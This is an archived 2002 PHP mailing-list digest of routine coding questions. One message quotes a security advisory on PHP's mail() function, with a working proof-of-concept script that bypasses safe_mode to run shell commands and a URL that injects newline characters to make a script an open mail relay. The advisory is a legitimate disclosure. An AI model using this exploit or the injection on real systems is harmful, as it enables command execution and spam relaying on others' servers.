|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
php-general-digest-help_at_lists.php.net
Date: Sun Aug 25 2002 - 10:45:34 CDT
php-general Digest 25 Aug 2002 15:45:34 -0000 Issue 1546
Topics (messages 114024 through 114058):
Dynamically Downloading Data
114024 by: Randy Johnson
114052 by: salamander
Re: Base64 and MS Word cutting and pasting.
114025 by: Manuel Lemos
Re: Recent discovered mail security bug in php
114026 by: Manuel Lemos
114027 by: Randy Johnson
114030 by: Manuel Lemos
Re: moving content from one database to another, help
114028 by: Richard Lynch
Session woes
114029 by: Matthew Nock
Open a new window by code
114031 by: Alva Chew
114032 by: Dan Harrington
114034 by: Justin French
Re: Message Post with File Attachment
114033 by: Justin French
Re: Pulling data out of browser address bar
114035 by: Paul Roberts
Apache module failure
114036 by: Casey Allen Shobe
Additional: [PHP] Apache module failure
114037 by: Casey Allen Shobe
need to find a way to remove similar keys
114038 by: electroteque
114039 by: electroteque
114041 by: electroteque
GD lib. image quality!
114040 by: Arcadius A.
114055 by: electroteque
Re: Count number of rows in table.
114042 by: Tony Harrison
114047 by: Matt
114048 by: Bas Jobsen
114050 by: salamander
114053 by: Jason Wong
problem with using link variables
114043 by: Ivan Carey
114044 by: Bas Jobsen
114045 by: Arcadius A.
known bugs in current CHM, contribution appreciated!
114046 by: Gabor Hojtsy
Re: uploading problems...please help
114049 by: Jason Wong
Re: register globals on in stand alone php installation?
114051 by: Jason Wong
trouble with function
114054 by: Justin French
114056 by: Matt
114058 by: Michael Sims
Re: Attachements
114057 by: Oliver Witt
Administrivia:
To subscribe to the digest, e-mail:
php-general-digest-subscribe
lists.php.net
To unsubscribe from the digest, e-mail:
php-general-digest-unsubscribelists.php.net
To post to the list, e-mail:
php-generallists.php.net
----------------------------------------------------------------------
attached mail follows:
Hello,
Is it possible to select data from a database and have it be available for
download without actually creating a file on the server?
Randy
attached mail follows:
Randy,
Try using a View, or a Temp Table in your database.
This keeps the data "available" in a specified form.
Best regards,
Andrew Hill
OpenLink Software
On Sunday, August 25, 2002, at 12:23 AM, Randy Johnson wrote:
> Hello,
>
> Is it possible to select data from a database and have it be available
> for
> download without actually creating a file on the server?
>
> Randy
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
attached mail follows:
Hello,
On 08/24/2002 07:17 PM, Dennis Moore wrote:
> I have an application which uses the <textarea> tag for users to input data. This works fine. However, some users are using MS Word to generate the text and then cutting and pasting into the <textarea>. This works fine as well.
>
> However, I am encountering a problem when the application mails the submitted content. Everything is viewed fine throught the web. We are MIME encoding the message using base64 functions. The problem is that not all email clients are decoding the MS Word pasted content properly. Quotes and apostrophes are not being decoded properly.
>
> I assume the problem is that the MS Word pasted content is not ASCII. I need to convert this content to ASCII before we encode the MIME message.
>
> Do you have any ideas?
You should not be using base64 but rather quoted-printable with the
right character encoding headers.
If you do not know how to do it, take a look at this class and examples
to see how to specify the encoding:
http://www.phpclasses.org/mimemessage
--Regards, Manuel Lemos
attached mail follows:
Hello.
On 08/24/2002 04:32 PM, Robert Mena wrote: > Hi, > > After reading the security announcement I'd like to > know two things :
What security announcement?
> > a) If i use another MTA (such as qmail) am I still > vulnerable ? > > b) What's the impact of the second vulnerability > (called open relay) ?
This sounds like an e-mail setup problem, not something to do with PHP.
--Regards, Manuel Lemos
attached mail follows:
He may be referring to this:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product: PHP
Version: 4.x up to 4.2.2
Vendor: http://www.php.net/
Author: Wojciech Purczynski <cliphisec.pl>
Date: June 13, 2002
Updated: August 23, 2002
Released: August 21, 2002
Issue:
======
Two vulnerabilities exists in mail() PHP function. The first one allows to
execute any program/script bypassing safe_mode restriction, the second one
may give an open-relay script if mail() function is not carefully used in
PHP scripts.
Description:
============
PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.
Details:
========
(1) Bypassing safe_mode restriction
If PHP is configured with safe_mode option enabled, special restriction
are set up including limit on external binaries that may be executed
from within a PHP script.
The 5th argument to the mail() function (introduced in version 4.0.5)
allow specifying command line option to the sendmail binary. Some time
ago a bug was found in the mail() function allowing to pass shell
meta-characters in the 5th argument, leading to execute arbitrary shell
commands or external binaries. This bug was fixed in version 4.1.0.
However, mail() function is still vulnerable because it allows to pass
command line arguments to the sendmail binary which gives the ability to
influence its behavior (i.e. by using non-default aliases, custom
configuration files - other cases are possible with others MTAs)
Passing 5th argument should be disabled if PHP is configured in safe_mode.
Exploit attached at the end.
(2) Injecting ASCII control characters into mail() arguments
Arbitrary ASCII control characters may be injected into string arguments
of mail() function. If mail() arguments are takeon from user's input it
may give the user ability to alter message content including mail
headers.
Example of such a vulnerability may be found on PHP.net site:
(URL wrapped for readability)
http://www.php.net/mailing-lists.php?
maillist=youremail.com%0a&email=fakefrom.net%0a
PHP should do content filtering before creating message body sent
with "sendmail -t" command.
Impact:
=======
(1) Any user may bypass safe_mode restrictions if mail() function is not
disabled.
(2) Open-relay PHP script if user's data is poorly or not filtered and
passed to the mail() function.
Exploit:
========
Sample exploit for (1) that works with sendmail MTA:
- -----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
- -----8<----- bypass_safe_mode.php -----8<-----
Fix:
====
(1) has been successfully fixed in the latest CVS snapshot. Fix for the
(2) is not sufficient and it is still possible to inject ASCII control
characters that causes argument string to be truncated. Please refer to
the example URL mentioned above.
These bugs haven't been fixed yet in the latest 4.2.2 stable release.
- --
Wojciech Purczynski
iSEC Security Research
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE9ZeSsC+8U3Z5wpu4RAsqBAKC04X7sCrcOQOXjpXgPqDXQjUEufgCfcokE
5n+9UMdQVqw1HYdh2opFsjY=
=iKiW
-----END PGP SIGNATURE-----
----- Original Message -----
From: "Manuel Lemos" <mlemosacm.org>
To: <php-generallists.php.net>
Sent: Sunday, August 25, 2002 12:55 AM
Subject: [PHP] Re: Recent discovered mail security bug in php
> Hello. > > On 08/24/2002 04:32 PM, Robert Mena wrote: > > Hi, > > > > After reading the security announcement I'd like to > > know two things : > > What security announcement? > > > > > > a) If i use another MTA (such as qmail) am I still > > vulnerable ? > > > > b) What's the impact of the second vulnerability > > (called open relay) ? > > This sounds like an e-mail setup problem, not something to do with PHP. > > > -- > > Regards, > Manuel Lemos > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php >
attached mail follows:
Hello,
On 08/25/2002 01:56 AM, Randy Johnson wrote: > He may be referring to this:
Ah, ok. These are not real security bugs if you control your own server and use escape your scripts data properly. It is a good idea that they are prevented in PHP though.
--Regards, Manuel Lemos
attached mail follows:
>I'm sorry, I thought that what I was asking was very simple. but everyone >wants to make it more >difficult then it actually is.
No, you just hadn't quite explained what you needed properly.
There were simply too many undefined points in your email for a reasonable answer to be given.
If you really want to ignore the experts and do it your way, here's a crude sample script that should be pretty close to what you think you want:
<?php # Untested code written on the fly: $stage = mysql_connect('stage.example.com', 'stageuser', 'stagepass') or die('Could not connect to stage database'); mysql_select_db('stage', $stage) or die('Could not select stage database'); $production = mysql_connect('production.example.com', 'productionuser', 'productionpass') or die('Could not connect to production database'); mysql_select_db('production', $production) or die('Could not select production database'); # Update production data to "archived" status: $query = "update sometable set archived = 1"; mysql_query($query, $production) or die("Could not update production database to 'archived'"); # Find out which IDs already exist in 'production' $query = "select whatever_id from sometable"; $archived = mysql_query($query, $production) or die("Could not obtain production IDs"); $archived_ids = array(); while (list($id) = mysql_fetch_row($archived)){ $archived_ids[] = $id; } # Snag any staged content that is not yet archived (ie, on production): $archived_ids_sql = implode(', ', $archived_ids; $query = "select whatever_id, whatever_columns from sometable where whatever_id in ($archived_ids_sql)"; $newbies = mysql_query($query, $stage) or die("Could not obtain stage data"); # Copy all those rows to 'production' while (list($whatever_id, $whatever_columns) = mysql_fetch_row($newbies)){ $query = "insert into whatever(whatever_id, whatever_columns) "; $query = "values($whatever_id, '$whatever_columns') "; mysql_query($query, $production) or die("Could not insert $whatever_id into production"); } ?>
NOTES: You could put this on 'stage' or 'production' server and run it from a cron job, or on demand from some other script, or just by loading it into a browser.
You'll need to configure MySQL on the machine where this script is *not* living to accept connections from the "other" machine. In other words, assuming you put this on 'stage', and you expect the script to be able to mysql_connect('production.example.com' ..., you will need to configure MySQL on 'production.example.com' to accept connections from 'stage.example.com' I think MySQL out of the box will only accept connections from 'localhost' (ie, the same machine as it's on)
You could gain a little (or maybe a lot...) of performance by using MySQL's multiple-insert syntax instead of doing a different insert query for every single new row in 'stage'. However, multiple-insert syntax will not be portable to most other SQL engines, I don't think.
You can either repeat the above technique for as many tables as you need, *OR* if you have a zillion tables, you could use http://php.net/mysql-list-tables to get all the tables in the database (either one) and then http://php.net/mysql-list-fields to figure out what tables/fields are in each database and build your queries dynamically.
WARNING: This is probably not the right way to do what you want to do. I'm only answering your question, no matter how wrong that question might be :-) The experts have already told you that, and you don't seem to want to listen, though, so I figure you might as well try it your way and see what happens.
You might some day find it easier to re-think your design, however, and time-stamp the records that can be "archived" and then always just use mysqldump to move stage -> production.
You would then add an extra table/field to your schema that tracked when the previous 'move' occurred, and any records 'older' than that would be 'archived' records, not 'current'
Using mysqldump and a time-stamp will "scale up" *MUCH* better if the number of records/tables/fields increases dramatically...
The above script is very, very crude and will *NOT* do well when zillions of records are added to stage at once.
If you don't expect the numbers to ever become large, just do whichever one makes you happy :-)
But if you are thinking this database might grow large, doing it the way above is insane.
YMMV
-- Like Music? http://l-i-e.com/artists.htm
attached mail follows:
Hi All,
I have a bit of a problem using the session management functions in PHP4. (PHP 4.1.2 in fact)
I have a "order wizard" system on my website that is using PHP sessions to track values entered on the various forms across all pages of the wizard.
at the start of each page i am issuing the "session_start();" command.
Session ID's are passed in the GET string as part of the URL, and form values are posted..
each page submits the user data back onto itself (I have all my validation etc at the top of the document) - thus if the user fails to enter certain values, the page doesnt move into the next step, but instead alert them to their errors.
if the form values pass, the form will move on to the next page using a header(location: nextpage.php) command.
the problem I have, however, is that on the third page of my wizard, if the user submits only some of the required fields, it submits back onto itself and displays an error as required, but the problem is that when you fill in the missing fields and move on to the next page (in effect back onto itself first, then on to the next page) the fields that had their values missing, are not passed along...
Does this all make sense? I can provide all the code samples if need be.
I have tested this scenario using a PC running apache under Win2K, and also on a Unix box with Apache - same problem.
Thanks for any help.
M
attached mail follows:
Hi,
Does anyone know how can i open a new browser window by PHP code?
Thanks and regards. Alva Chew
attached mail follows:
You can't with PHP exclusively as far as I know.
But you can do this: <? print(" <script language=\"JavaScript\"> <!-- window.open(foobar); //--> </script>");
and it will open a new window.
> -----Original Message-----
> From: Alva Chew [mailto:alvastridec.com]
> Sent: Sunday, August 25, 2002 12:39 AM
> To: php-generallists.php.net
> Subject: [PHP] Open a new window by code
>
>
> Hi,
>
> Does anyone know how can i open a new browser window by PHP code?
>
> Thanks and regards.
> Alva Chew
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
attached mail follows:
*sigh*
This gets asked EVERY DAY on the list.
1. search the archives before posting
2. PHP is server-side, so there's no way it can interact with the client-side... try javascript
Justin French
on 25/08/02 4:38 PM, Alva Chew (alvastridec.com) wrote:
> Hi, > > Does anyone know how can i open a new browser window by PHP code? > > Thanks and regards. > Alva Chew > >
attached mail follows:
Search the manual for "File Uploads"... there's an excellent code example, plus user-cont notes, etc etc.
In other words, read the manual before asking :)
Justin French
on 25/08/02 5:27 AM, JohnP (aercaerc.biz) wrote:
> > Ok gang here is the problem - I need to allow the user to post a message with > a title and allow them to upload a file as well - the message and title need > to post to the db which is pretty cut and dry but since I have never worked > with uploading before I do not know how to allow the user to upload files - > can anyone help? Right now I have a form setup with all three fields but I'm > not sure where to go from here? Thanks - > JohnP > >
attached mail follows:
try $REQUEST_URI The URI which was given in order to access this page; for instance, '/index.html'.
Paul Roberts
http://www.paul-roberts.com
mailpaul-roberts.com
++++++++++++++++++++++++
----- Original Message -----
From: <rdkurthstarband.net>
To: "php-general" <php-generallists.php.net>
Sent: Friday, August 23, 2002 10:54 PM
Subject: Re[4]: [PHP] Pulling data out of browser address bar
> This is close to what I want but I don't what to redirect them I just
> want to get what is in the URL so I can but it in a variable to use on
> the web page. I have a lot of domain names all pointing to one domain
> and I want to be able to put "WELCOME TO TheDomannamethaytypedin.com" at the top of
> the page depending on what domain they typed into the URL. They will
> not be coming from another page they will most likely be typing the
> URL in
>
> Friday, August 23, 2002, 2:22:21 PM, you wrote:
>
>
> SJNHBe> This probably isn't doing what you want but it will illustrate how to get
> SJNHBe> the location.
>
> SJNHBe> <script language="javascript">
> SJNHBe> <!--
> SJNHBe> function checklocation(goodurl) {
> SJNHBe> if (self.window.location != goodurl) {
> SJNHBe> self.window.location = goodurl;
> SJNHBe> }
>
> SJNHBe> }
> -->>
> SJNHBe> </script>
>
> SJNHBe> Bascially you call checklocation with the url they should be at, if they
> SJNHBe> aren't at that url it will redirect them to their URL.
>
> SJNHBe> I use this script by placing and onLoad event in the <body> tag, an example
> SJNHBe> is <body style="font-family: Arial" bgcolor="FFFFFF"
> SJNHBe> onLoad="checklocation('http://www.yoursite.com/login.php')">
>
>
> SJNHBe> I created this script because some people were only going to yoursite.com
> SJNHBe> instead of www.yoursite.com, this caused sessions not to work because the
> SJNHBe> browser was not sending the cookies with the request because the cookies
> SJNHBe> were for www.yoursite.com.
>
> SJNHBe> Jason
> SJNHBe> -----Original Message-----
> SJNHBe> From: rdkurthstarband.net [mailto:rdkurthstarband.net]
> SJNHBe> Sent: Friday, August 23, 2002 3:24 PM
> SJNHBe> To: php-general
> SJNHBe> Subject: Re[2]: [PHP] Pulling data out of browser address bar
>
> SJNHBe> Hello Kevin,
> SJNHBe> I don't what to know where that came from I what to know what is in
> SJNHBe> the Address bar of the browser. They might not be coming from anywhere
> SJNHBe> they might have just typed the url in. I will look at doing it with
> SJNHBe> Javascript
>
> SJNHBe> Friday, August 23, 2002, 1:21:10 PM, you wrote:
>
>
> KS>> You can do it with Javascript but there's no need. $HTTP_REFERER is
> SJNHBe> what
> KS>> you want. It'll tell you where your users are coming from. So you'll
> SJNHBe> know
> KS>> if they have been redirected from one your other domains.
> KS>> -Kevin
>
> KS>> ----- Original Message -----
> KS>> From: <rdkurthstarband.net>
> KS>> To: "php-general" <php-generallists.php.net>
> KS>> Sent: Friday, August 23, 2002 2:19 PM
> KS>> Subject: [PHP] Pulling data out of browser address bar
>
>
> >>> Is there any way to tell what was typed in the browser to get to the
> >>> web page.
> >>> What I have is domain names that forward to a main domain and I
> >>> want to know what they typed in the browser to get to the main domain.
> >>> The way it is forwarded the browser retains what ever was typed
> >>> in the address bar. How can I pull what was typed into the address bar
> >>> this info into the web page.
> >>>
> >>>
> >>>
> >>> --
> >>> Best regards,
> >>> rdkurth mailto:rdkurthstarband.net
> >>>
> >>>
> >>> --
> >>> PHP General Mailing List (http://www.php.net/)
> >>> To unsubscribe, visit: http://www.php.net/unsub.php
> >>>
>
>
>
>
>
>
>
>
> --
> Best regards,
> rdkurth mailto:rdkurthstarband.net
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
>
attached mail follows:
rootepona:/etc# apachectl start
Syntax error on line 14 of /etc/httpd.conf:
Cannot load /usr/lib/libphp4.so into server: /usr/lib/libphp4.so: undefined
symbol: alloc_globals
/usr/sbin/apachectl start: httpd could not be started
rootepona:/etc# head -n 14 /etc/httpd.conf | tail -n 1
LoadModule php4_module lib/libphp4.so
Installation process used: ./configure --prefix=/usr --sysconfdir=/etc --without-mysql --with-pgsql --enable-memory-limit --with-zlib --with-bz2 --with-openssl --with-config-file-path=/etc --enable-track-vars --enable-bcmath --enable-calendar --with-gdbm --with-gmp --with-apxs=/usr/sbin/apxs && make && make install
PHP version: 4.2.2
Apache version: 1.3.26 compiled as follows: ./configure --prefix=/usr --sysconfdir=/etc --mandir=/usr/share/man --localstatedir=/var --libexecdir=/usr/lib --datadir=/var/www/default --with-layout=GNU --enable-module=so --enable-module=speling --enable-module=unique_id --enable-module=usertrack --enable-module=vhost_alias --enable-module=log_agent --enable-module=info && make && make install
rootepona:/etc# ldd /usr/lib/libphp4.so
libdl.so.2 => /lib/libdl.so.2 (0x4016a000)
libpq.so.2 => /usr/lib/libpq.so.2 (0x4016e000)
libgmp.so.3 => /usr/lib/libgmp.so.3 (0x40182000)
libgdbm.so.2 => /usr/lib/libgdbm.so.2 (0x401bb000)
libbz2.so.1.0 => /lib/libbz2.so.1.0 (0x401c1000)
libz.so.1 => /usr/lib/libz.so.1 (0x401d1000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x401e2000)
libssl.so.0.9.6 => /usr/lib/libssl.so.0.9.6 (0x4020f000)
libcrypto.so.0.9.6 => /usr/lib/libcrypto.so.0.9.6 (0x40240000)
libresolv.so.2 => /lib/libresolv.so.2 (0x4030f000)
libm.so.6 => /lib/libm.so.6 (0x40322000)
libnsl.so.1 => /lib/libnsl.so.1 (0x40345000)
libc.so.6 => /lib/libc.so.6 (0x4035b000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x80000000)
I would much rather be using Apache 2.0.40, however PHP would not build at all with --with-apxs2=/usr/sbin/apxs on another machine with Apache 2.0.40 installed.
In any case, I really need to get something working. Any advice is appreciated.
-- Casey Allen Shobe / Network Security Analyst & PHP Developer SecureWorks, Inc. / 404.327.6339 x169 / Fax: 404.728.0144 cshobe
attached mail follows:
On Sunday 25 August 2002 06:10 am, Casey Allen Shobe wrote: > I would much rather be using Apache 2.0.40, however PHP would not build at > all with --with-apxs2=/usr/sbin/apxs on another machine with Apache 2.0.40 > installed.
I was stupid in saying that without mentioning any further detail...here follows what I should have mentioned previously:
package php:/usr/src/php/php-4.2.2> ./configure --prefix=/usr --sysconfdir=/etc --without-mysql --with-pgsql --enable-memory-limit --with-zlib --with-bz2 --with-openssl --with-config-file-path=/etc --enable-track-vars --enable-bcmath --enable-calendar --with-gdbm --with-gmp --with-apxs2=/usr/sbin/apxs [...configure completes successfully...] package php:/usr/src/php/php-4.2.2> make [...snip...] Making all in apache2filter make[2]: Entering directory `/usr/src/php/php-4.2.2/sapi/apache2filter' make[3]: Entering directory `/usr/src/php/php-4.2.2/sapi/apache2filter' /bin/sh /usr/src/php/php-4.2.2/libtool --silent --mode=compile gcc -I. -I/usr/src/php/php-4.2.2/sapi/apache2filter -I/usr/src/php/php-4.2.2/main -I/usr/src/php/php-4.2.2 -I/usr/include/apache2 -I/usr/src/php/php-4.2.2/Zend -I/usr/src/php/php-4.2.2/ext/xml/expat -D_REENTRANT -I/usr/src/php/php-4.2.2/TSRM -O3 -march=i686 -mcpu=i686 -funroll-loops -ffast-math -pthread -DZTS -prefer-pic -c sapi_apache2.c sapi_apache2.c: In function `php_register_hook': sapi_apache2.c:534: warning: passing arg 3 of `ap_register_output_filter' makes pointer from integer without a cast sapi_apache2.c:534: too few arguments to function `ap_register_output_filter' sapi_apache2.c:535: warning: passing arg 3 of `ap_register_input_filter' makes pointer from integer without a cast sapi_apache2.c:535: too few arguments to function `ap_register_input_filter' make[3]: *** [sapi_apache2.lo] Error 1 make[3]: Leaving directory `/usr/src/php/php-4.2.2/sapi/apache2filter' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/usr/src/php/php-4.2.2/sapi/apache2filter' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/usr/src/php/php-4.2.2/sapi' make: *** [all-recursive] Error 1 package php:/usr/src/php/php-4.2.2>
Again, thanks in advance for any advice.
-- Casey Allen Shobe / Network Security Analyst & PHP Developer SecureWorks, Inc. / 404.327.6339 x169 / Fax: 404.728.0144 cshobe
attached mail follows:
hi i am trying to find a possible way to remove similar id keys and pass back just each different one , for example i have a photo gallery each photo has a userID key of who the photo was taken by i would like to grab all the id for each photo and pass back just one result of the different people who have taken the photos
so i append them all like 1, 1, 1, 1, 2, 1, 2, 1, 3 and i just want to get back 1, 2, 3 keys?
attached mail follows:
sorry i found array_unique , so then how could i append the keys out of mysql bak into one array ?
"Electroteque" <danielelectroteque.org> wrote in message
news:20020825105249.93073.qmailpb1.pair.com...
> hi i am trying to find a possible way to remove similar id keys and pass
> back just each different one , for example i have a photo gallery each
photo
> has a userID key of who the photo was taken by i would like to grab all
the
> id for each photo and pass back just one result of the different people
who
> have taken the photos
>
> so i append them all like 1, 1, 1, 1, 2, 1, 2, 1, 3 and i just want to get
> back 1, 2, 3 keys?
>
>
attached mail follows:
never mind
SELECT DISTINCT u.user_name, u.email, p.userID FROM user u LEFT JOIN photos p on p.userID=u.user_id WHERE p.galleryID='$galleryID'
heh
"Electroteque" <danielelectroteque.org> wrote in message
news:20020825105249.93073.qmailpb1.pair.com...
> hi i am trying to find a possible way to remove similar id keys and pass
> back just each different one , for example i have a photo gallery each
photo
> has a userID key of who the photo was taken by i would like to grab all
the
> id for each photo and pass back just one result of the different people
who
> have taken the photos
>
> so i append them all like 1, 1, 1, 1, 2, 1, 2, 1, 3 and i just want to get
> back 1, 2, 3 keys?
>
>
attached mail follows:
Hello! I wrote a little script for generation thumbnails of larger images.... <code> $origImage = imageCreateFromJpeg($sourcePath."/".$currentImageName); $thumbnail = imageCreate($thumbWidth,$thumbHeight);// create empty image
imageCopyResized($thumbnail,$origImage,0,0,0,0,$thumbWidth,$thumbHeight,imag esX($origImage),imagesY($origImage)); imageJpeg($thumbnail, $targetPath."/".$thumbNamePrefix."_thumb.jpg"); // Store it imageDestroy($thumbnail); // cleanup echo "<br>Image ".$targetPath."/".$thumbNamePrefix."_thumb.jpg"." created successfully!";
</code>
then, I've noticed that the quality of the thumbnails created is very bad! my "phpinfo()" page shows "2.0 or higher" as GD version
So, I'm wondering whether I'm doing something wrong in my code or whether there exist a better library to use with PHP ... a library able to generate good quality JPG files...
Thanks in advance.
Arcadius.
attached mail follows:
its not a gd 2 issue , i cant even get gd2 to compile with php 4.2.2, no idea why i've installed gd2 fine
imageJpeg($thumbnail, $targetPath."/".$thumbNamePrefix."_thumb.jpg",100);
that'll give it a quality of 100 , even still i notice its pretty bad , i
need to use the bicubicresampled gd2 function just need it compiled
correctly , how did you get gd2 to work ?
"Arcadius A." <ahouanssh.cvut.cz> wrote in message
news:20020825111055.4910.qmailpb1.pair.com...
> Hello!
> I wrote a little script for generation thumbnails of larger images....
> <code>
> $origImage = imageCreateFromJpeg($sourcePath."/".$currentImageName);
> $thumbnail = imageCreate($thumbWidth,$thumbHeight);// create empty
image
>
>
imageCopyResized($thumbnail,$origImage,0,0,0,0,$thumbWidth,$thumbHeight,imag
> esX($origImage),imagesY($origImage));
> imageJpeg($thumbnail, $targetPath."/".$thumbNamePrefix."_thumb.jpg");
//
> Store it
> imageDestroy($thumbnail); // cleanup
> echo "<br>Image ".$targetPath."/".$thumbNamePrefix."_thumb.jpg"."
> created successfully!";
>
> </code>
>
> then, I've noticed that the quality of the thumbnails created is very bad!
> my "phpinfo()" page shows "2.0 or higher" as GD version
>
> So, I'm wondering whether I'm doing something wrong in my code or whether
> there exist a better library to use with PHP ... a library able to
generate
> good quality JPG files...
>
> Thanks in advance.
>
> Arcadius.
>
>
>
attached mail follows:
And do I need to use any other functions like mysql_fetch_row() ?
"Martín marqués" <martinbugs.unl.edu.ar> wrote in message
news:200208241133.20121.martinbugs.unl.edu.ar...
> On Sáb 24 Ago 2002 11:19, Tony Harrison wrote:
> > How would I count the number of rows in a mysql table with a WHERE
clause?
>
> select count(*) from table_name WHERE .....
>
> Saludos... :-)
>
> --
> Porqué usar una base de datos relacional cualquiera,
> si podés usar PostgreSQL?
> -----------------------------------------------------------------
> Martín Marqués | mmarquesunl.edu.ar
> Programador, Administrador, DBA | Centro de Telematica
> Universidad Nacional
> del Litoral
> -----------------------------------------------------------------
attached mail follows:
>>> On Sáb 24 Ago 2002 11:19, Tony Harrison wrote:
>>> How would I count the number of rows in a mysql table with a WHERE
>>> clause?
> >
>> "Martín marqués" <martinbugs.unl.edu.ar> wrote in message
> > news:200208241133.20121.martinbugs.unl.edu.ar...
> > select count(*) from table_name WHERE .....
> >
>From: "Tony Harrison" <tonyh21tharrison21.fsnet.co.uk>
> Sent: Saturday, August 24, 2002 5:54 PM
> Subject: Re: [PHP] Count number of rows in table.
>
> And do I need to use any other functions like mysql_fetch_row() ?
>
Yes. It's a regular sql statement, so you must fetch the results.
$sql = "select count(*) from table_name WHERE ....."; $result = mysql_query($sql) or die(mysql_error); $row = mysql_fetch_row($result); $rowCount=$row[0];
attached mail follows:
> $sql = "select count(*) from table_name WHERE ....."; > $result = mysql_query($sql) or die(mysql_error); > $row = mysql_fetch_row($result); > $rowCount=$row[0]; or $sql = "select count(*) from table_name WHERE ....."; $result = mysql_query($sql) or die(mysql_error); $rowCount=mysql_result($result);
attached mail follows:
or, you should be able to simply do this, without the cost of fetching the results:
$result = mysql_query("SELECT count(*) FROM table WHERE"); $num_rows = mysql_num_rows($result); echo "$num_rows Rows\n";
>> $sql = "select count(*) from table_name WHERE ....."; >> $result = mysql_query($sql) or die(mysql_error); >> $row = mysql_fetch_row($result); >> $rowCount=$row[0]; > or > $sql = "select count(*) from table_name WHERE ....."; > $result = mysql_query($sql) or die(mysql_error); > $rowCount=mysql_result($result); > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
attached mail follows:
On Sunday 25 August 2002 22:07, salamander wrote: > or, you should be able to simply do this, without the cost of fetching > the results: > > $result = mysql_query("SELECT count(*) FROM table WHERE"); > $num_rows = mysql_num_rows($result); > echo "$num_rows Rows\n";
No. This only returns 1 row regardless. "SELECT COUNT(*) FROM ..." only returns a single row with a single column containing the row count. Using mysql_num_rows() on that will always return 1.
-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development */* I'm going to Vietnam at the request of the White House. President Johnson says a war isn't really a war without my jokes. -- Bob Hope */
attached mail follows:
Hello, I am sending variables via a link to another page eg. <a href=\"agencydet.php?provnum=$provservid\">$provservdesc</a>
If the variable provnum contains text such as: hello & there
Then only the word hello is passed on to agencydet.php.
I have tried using htmlspecialchars and htmlentities but still I have the same problem.
What I am trying to achieve is to be able to display hello & there on the agencydet.php page when it is shown in the browser.
Thanks, Ivan
attached mail follows:
> If the variable provnum contains text such as: hello & there
urlencode($provnum);
attached mail follows:
See the URL functions at http://www.php.net/manual/en/ref.url.php IMHO, you'd need some encoding....
Arcadius
"Ivan Carey" <icareybigpond.com> wrote in message
news:006b01c24c2f$8d291950$0201a8c0ivan...
Hello,
I am sending variables via a link to another page eg. <a
href=\"agencydet.php?provnum=$provservid\">$provservdesc</a>
If the variable provnum contains text such as: hello & there
Then only the word hello is passed on to agencydet.php.
I have tried using htmlspecialchars and htmlentities but still I have the same problem.
What I am trying to achieve is to be able to display hello & there on the agencydet.php page when it is shown in the browser.
Thanks, Ivan
attached mail follows:
Hi!
I would like to ask you guys again, who have problems with the current CHM edition to help us make all them go away. We already corrected the example display problem, but some guys reported bugs about the context menu positioning and the page display process also has some bugs in IE6.
The bug descriptions and contribution requests are available at http://weblabor.hu/php-doc-chm/#knownbugs Please contribute to this great project if you have some JS experience and the appropriate software to test. I am not going to upgrade to IE6 myself, that is for sure, sorry.
As far as I can see, the context menu positioning is OK logically, but some reports keep posted to the CHM list. The page display problems are simply bugs in IE, and we need to find a workaround.
For those who tested iframetests.zip I have released a new version so please test again!
Thanks for your help and contribution to the PHP community, Goba
attached mail follows:
On Sunday 25 August 2002 05:53, Brian & Shannon Windsor wrote: > I'm trying to upload files from my PC to my website. The code is a little > nuts, but it's all I got to work locally, butonce I take the code to the > web I get this message. Can anyone tell me what I'm doing wrong? > > I'm trying to upload a file, strip all the information so as to just use > the name of the file to store in the database. I'm using explode and > array_pop for this, but I'm sure there's a better way. The problem seems > to be in writing the file to the web server. I changed the permissions on > the directories, so I don't think that's the problem. Please help.
Why is it that everyone likes to write their own upload routine? There is a perfectly good example in the manual that (a) works, (b) shows how it _should_ be done. Try using that as a starting point and adapt it to your particular situation.
-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development */* Many people are desperately looking for some wise advice which will recommend that they do what they want to do. */
attached mail follows:
On Saturday 24 August 2002 16:52, Andy wrote:
> I do have a command line php version installed and I need to switch > register globals to on for this install. Where do I find this php.ini > regarding this installation. There is also a web-php installation running > where I do have a php.ini for. I hope there is a way to seperate those two > installations.
When you configure/compile php you can specify where you want php to look for php.ini.
-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development */* Nobody knows what goes between his cold toes and his warm ears. -- Roy Harper */
attached mail follows:
Hi,
This is the first time I've REALLY tackled multi-dimensional arrays, in conjunctions with functions.
I like the way this code works:
<? $sql = "select from...."; $result = mysql_result($sql); while($myrow = mysql_fetch_array($result)) { echo $myrow['colname']; } ?>
So I built a function which returns a multi-dimensional array:
